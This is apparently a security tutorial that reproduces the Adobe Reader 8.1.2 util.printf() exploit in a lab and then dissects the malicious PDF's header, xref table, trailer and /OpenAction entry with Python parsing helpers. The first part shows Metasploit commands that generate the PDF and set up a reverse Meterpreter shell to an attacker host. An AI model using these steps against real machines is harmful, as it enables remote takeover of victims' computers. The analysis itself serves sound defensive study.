One of the first things we need to do is uninstall the version of Adobe PDF Reader currently installed and replace it with an older, vulnerable version.
Old versions of PDF Reader can be found on various websites, but the most prominent of them is definitely OldApps. We need a specific version of Adobe PDF Reader, one that is vulnerable to the util.printf() buffer overflow. But which version do we need? Luckily, an exploit for the util.printf() buffer overflow is available as a Metasploit module, as we can see in the picture below:
The module targets Adobe PDF Reader versions up to and including 8.1.2, so we download version 8.1.2 from OldApps and install it on the system. The installation of the old, vulnerable PDF Reader can be observed below:
When the installation is complete, we can check whether the correct version was installed. To do that, we start Adobe PDF Reader normally and click Help > About Adobe Reader 8, which opens the dialog shown below:
The correct version of Adobe Reader, 8.1.2, is installed. Now we've come to the part where we test the Metasploit module. To do that, we download Metasploit, start msfconsole, and execute the commands below:
msf > use exploit/windows/browser/adobe_utilprintf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.1.134
msf exploit(adobe_utilprintf) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.134:4444
[*] Using URL: http://0.0.0.0:8080/RoNPyF
[*] Local IP: http://192.168.1.134:8080/RoNPyF
[*] Server started.
First we select the adobe_utilprintf exploit with the use command. Then we set the Metasploit options that the exploit requires: PAYLOAD, which specifies the payload that runs once the exploit succeeds, and LHOST, the IP address of our attacking machine. The payload uses this IP to connect back to us, creating a reverse Meterpreter session that gives us control of the compromised computer with the privileges of the user who opened the document. Finally, the exploit command runs the configured module. As the output shows, it starts both a reverse handler on port 4444, which waits for the payload to connect, and a web server on port 8080 that serves the malicious PDF.
We can download the generated malicious PDF from the URL http://192.168.1.134:8080/RoNPyF and save it to disk as util_printf.pdf. Then we copy it to the target machine (the one running the vulnerable version of Adobe PDF Reader) and open it.
When we open the malicious PDF document in a vulnerable Adobe PDF Reader, a new Meterpreter session should be opened, as shown in the picture below:
We can then use the newly created session to interact with the compromised computer. This can be seen in the picture below, where we first attach to the new session with the sessions -i 1 command and then run the sysinfo command, which gives us basic information about the compromised system. In our case, this is a Windows XP SP2 machine running on the x86 (32-bit) architecture.
2. Analyzing the PDF Document
The exploit works and gives us the Meterpreter session we want, so why should we care about how it's done? Well, the beauty is in the details, so in this section we'll take a look at how the malicious PDF document was created and how it uses the vulnerable function to execute arbitrary code on the target computer.
If we open util_printf.pdf in a text editor such as gvim, we can extract some information from it, but not all of it. For example, the header of the PDF document is shown in the picture below:
It's a standard PDF 1.5 document with a comment on the second line containing four bytes whose values are 128 or greater. The PDF specification recommends such a binary comment for files that contain binary data: applications that inspect the first few bytes of a file to decide whether to treat it as text or as binary will then handle the PDF as binary instead of processing it as ASCII text, which would damage it. That is also why these bytes sit at the very beginning of the file. Then there is the body section, shown in the picture below:
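Checking the header does not require a hex editor. The following is a minimal sketch, not part of the original workflow: it assumes the %PDF-x.y header is on the first line and the binary comment on the second, and the sample bytes (%âãÏÓ, a common choice) are illustrative rather than copied from util_printf.pdf. On the real file we would pass open("util_printf.pdf", "rb").read() instead.

```python
import re


def inspect_header(data: bytes) -> dict:
    """Return the PDF version and whether a binary-marker comment follows it."""
    # Split off the first two lines; PDF allows CR, LF or CRLF line endings.
    lines = re.split(rb"\r\n|\r|\n", data, maxsplit=2)
    match = re.match(rb"%PDF-(\d\.\d)", lines[0])
    version = match.group(1).decode("ascii") if match else None
    second = lines[1] if len(lines) > 1 else b""
    # Count bytes >= 128 after the '%' that starts the comment line.
    if second.startswith(b"%"):
        high_bytes = sum(1 for b in second[1:] if b >= 0x80)
    else:
        high_bytes = 0
    return {"version": version, "binary_marker": high_bytes >= 4, "high_bytes": high_bytes}


# Illustrative input only: the bytes E2 E3 CF D3 are a common marker choice.
sample = b"%PDF-1.5\n%\xe2\xe3\xcf\xd3\n1 0 obj\n"
print(inspect_header(sample))  # {'version': '1.5', 'binary_marker': True, 'high_bytes': 4}
```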
We can't really say anything definitive about this section, except that it writes many characters in more than one way. The character # followed by two hexadecimal digits is a single character in hexadecimal notation (for example, #41 is A). These escapes could easily be converted back into ASCII, but we won't do that manually, because it's inefficient and too time-consuming (in the modern world we have computers to do the work for us).
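Undoing the #xx escapes is a one-line substitution. The helper below is hypothetical, not taken from the article's tooling, and the example name is made up to show how an obfuscated /JavaScript key might look.

```python
import re


def decode_pdf_name(name: str) -> str:
    """Replace each '#xx' escape in a PDF name with the character it encodes."""
    return re.sub(r"#([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), name)


print(decode_pdf_name("/#4aava#53cr#69pt"))  # /JavaScript
```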
The picture above also shows one encoded stream, which is unreadable at this point. On line 29 the stream is closed by the endstream keyword, and on line 30 the object is closed by the endobj keyword. What follows is the cross-reference (xref) table, shown in the following picture:
The cross-reference table has seven entries: entry 0 plus six objects. Entry 0, with offset 0 and generation number 65535, is always present; it is marked free and never describes a real object. Each following line describes one object. The first object is located at byte offset 17 and has generation number 0. In fact, all of the objects have generation number 0: a generation number is only incremented when an object is deleted and its object number is freed for reuse, which hasn't happened in this freshly generated document. The cross-reference table is clean and gives us exactly what we need: the byte offsets of the six objects stored in the body of the PDF document (which is encoded and obfuscated).
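Reading the xref table can also be automated. This sketch assumes a classic (non-stream) table with a single subsection, as in the picture; parse_xref is our own name, and the sample is made up apart from the offset 17 mentioned above (0000000081 is invented).

```python
import re

# Subsection header ("first count") directly after the xref keyword.
XREF_HEADER = re.compile(rb"xref\s+(\d+)\s+(\d+)\s+")
# Each entry: 10-digit offset, 5-digit generation, 'n' (in use) or 'f' (free).
XREF_ENTRY = re.compile(rb"(\d{10}) (\d{5}) ([nf])\s*")


def parse_xref(data: bytes, start: int) -> list:
    """Parse a single-subsection xref table beginning at byte offset start."""
    header = XREF_HEADER.match(data, start)
    if header is None:
        raise ValueError("no xref table at the given offset")
    first, count = int(header.group(1)), int(header.group(2))
    pos = header.end()
    entries = []
    for obj_num in range(first, first + count):
        entry = XREF_ENTRY.match(data, pos)
        if entry is None:
            raise ValueError(f"malformed xref entry for object {obj_num}")
        offset, gen = int(entry.group(1)), int(entry.group(2))
        entries.append((obj_num, offset, gen, entry.group(3) == b"n"))
        pos = entry.end()
    return entries


sample = (
    b"xref\n0 3\n"
    b"0000000000 65535 f \n"
    b"0000000017 00000 n \n"
    b"0000000081 00000 n \n"
)
for row in parse_xref(sample, 0):
    print(row)  # (object number, byte offset, generation, in use)
```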
What follows is the Trailer section of the PDF document represented in the picture below:
The trailer contains the /Root entry, which specifies object 1 as the root object (the document catalog). There's also the /Size entry with the value 7. /Size is the total number of entries in the cross-reference table, including the free entry 0, so it is one greater than the highest object number: six objects are in use. Next, the startxref keyword specifies that the cross-reference table starts at byte offset 6386. The last line, the %%EOF marker, ends the PDF file.
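The trailer fields can be extracted the same way. This is a regex-based sketch assuming a single, uncompressed trailer dictionary; parse_trailer is a hypothetical helper name, and the sample reuses the values quoted above (/Size 7, /Root 1 0 R, startxref 6386).

```python
import re


def parse_trailer(data: bytes) -> dict:
    """Extract /Size, /Root and the startxref offset from a PDF trailer."""
    trailer_pos = data.rfind(b"trailer")
    # The last startxref in the file is the one a reader actually follows.
    startxrefs = list(re.finditer(rb"startxref\s+(\d+)", data))
    if trailer_pos == -1 or not startxrefs:
        raise ValueError("trailer or startxref not found")
    tail = data[trailer_pos:]
    size = re.search(rb"/Size\s+(\d+)", tail)
    root = re.search(rb"/Root\s+(\d+)\s+(\d+)\s+R", tail)
    return {
        "size": int(size.group(1)) if size else None,
        "root": (int(root.group(1)), int(root.group(2))) if root else None,
        "startxref": int(startxrefs[-1].group(1)),
    }


sample = b"trailer\n<< /Size 7 /Root 1 0 R >>\nstartxref\n6386\n%%EOF\n"
info = parse_trailer(sample)
print(info)  # {'size': 7, 'root': (1, 0), 'startxref': 6386}
# /Size counts every xref entry including free entry 0, so it is one
# greater than the highest object number.
print("highest object number:", info["size"] - 1)  # 6
```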
So far we've gathered a good deal of information about the malicious PDF document, but one section still needs to be analyzed: the body. We must be aware that PDF documents can apply several filters to compress or encode stream objects, making them unreadable as plain text. Therefore we can't simply read these objects from the file; we first need to decode them (decompress them or, if the document is encrypted, decrypt them) before displaying them on the screen. There are several tools that can do just that.
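To illustrate what such tools do, the sketch below inflates streams compressed with /FlateDecode, the most common PDF filter, using Python's zlib module. It is a simplification: it finds streams with a regular expression instead of honouring /Length, ignores /DecodeParms predictors and other filters, and does not handle encrypted documents; streams that fail to inflate are returned unchanged. The sample object is made up.

```python
import re
import zlib

# Stream body between "stream" + EOL and EOL + "endstream"; the lookbehind
# stops the "stream" inside "endstream" from being treated as a new start.
STREAM_RE = re.compile(rb"(?<!end)stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def inflate_streams(data: bytes) -> list:
    """Return each stream body, zlib-inflated when that succeeds."""
    results = []
    for match in STREAM_RE.finditer(data):
        body = match.group(1)
        try:
            results.append(zlib.decompress(body))
        except zlib.error:
            # Not Flate data (or truncated/damaged): keep the raw bytes.
            results.append(body)
    return results


doc = (
    b"4 0 obj\n<< /Filter /FlateDecode >>\nstream\n"
    + zlib.compress(b"example stream contents")
    + b"\nendstream\nendobj\n"
)
print(inflate_streams(doc))  # [b'example stream contents']
```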
In the chapters that follow, we'll present various tools that can be used to analyze malicious files. We'll also pretend that we know nothing about the PDF we're analyzing, so we'll try almost every available method to determine whether the PDF document is malicious and, if so, how it works.
We can decompress the compressed data in the PDF document util_printf.pdf with the following command:
# python pdf.py util_printf.pdf
Running the command above prints all the objects in the PDF document. Earlier we found that the document uses six objects, with IDs 1 through 6. The first part of the output shows the attributes of each object. Object 1 is the document catalog, which references the root of the document's page tree, object 3. The outlines object has ID 2.
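For a quick overview similar to the first part of this output, indirect objects can be listed with a regular expression. This is a rough sketch: it assumes uncompressed "N G obj ... endobj" blocks (no object streams) and can be confused if the bytes endobj appear inside stream data. The sample catalog only mirrors the structure described above; it is not the file's actual content.

```python
import re

# "N G obj ... endobj": object number, generation number, and the raw body.
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)endobj", re.DOTALL)


def list_objects(data: bytes) -> dict:
    """Map (object number, generation) to the stripped bytes of each object."""
    return {
        (int(m.group(1)), int(m.group(2))): m.group(3).strip()
        for m in OBJ_RE.finditer(data)
    }


doc = (
    b"1 0 obj\n<< /Type /Catalog /Outlines 2 0 R /Pages 3 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Outlines /Count 0 >>\nendobj\n"
)
for (num, gen), body in list_objects(doc).items():
    print(num, gen, body)
```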
The /OpenAction entry specifies a destination to display or an action to perform when the document is opened. Its value can be either an array defining a destination or an action dictionary representing an action. If the entry is absent, the document opens at the top of the first page by default.
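Looking up /OpenAction in the catalog is a useful triage step, since an action referenced there is performed as soon as the file is opened. The helper below is a hypothetical sketch: it recognizes an indirect reference (N G R), an inline destination array, or a flat inline action dictionary, but not nested dictionaries, and it assumes any #xx escapes in the names have already been decoded. Object numbers in the examples are illustrative.

```python
import re


def open_action(catalog: bytes):
    """Return the /OpenAction value of a catalog dictionary, or None."""
    # Case 1: indirect reference such as "/OpenAction 5 0 R".
    ref = re.search(rb"/OpenAction\s+(\d+)\s+(\d+)\s+R", catalog)
    if ref:
        return ("reference", int(ref.group(1)), int(ref.group(2)))
    # Case 2: inline destination array "[...]" or flat action dictionary "<<...>>".
    inline = re.search(rb"/OpenAction\s*(\[[^\]]*\]|<<.*?>>)", catalog, re.DOTALL)
    if inline:
        return ("inline", inline.group(1))
    return None


print(open_action(b"<< /Type /Catalog /Pages 3 0 R /OpenAction 5 0 R >>"))  # ('reference', 5, 0)
print(open_action(b"<< /OpenAction [3 0 R /Fit] >>"))  # ('inline', b'[3 0 R /Fit]')
```

A reference result tells us which object to inspect next; if that object turns out to be an action dictionary with /S /JavaScript, its /JS entry holds the script that runs on opening.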
All the objects can be better represented with the picture below: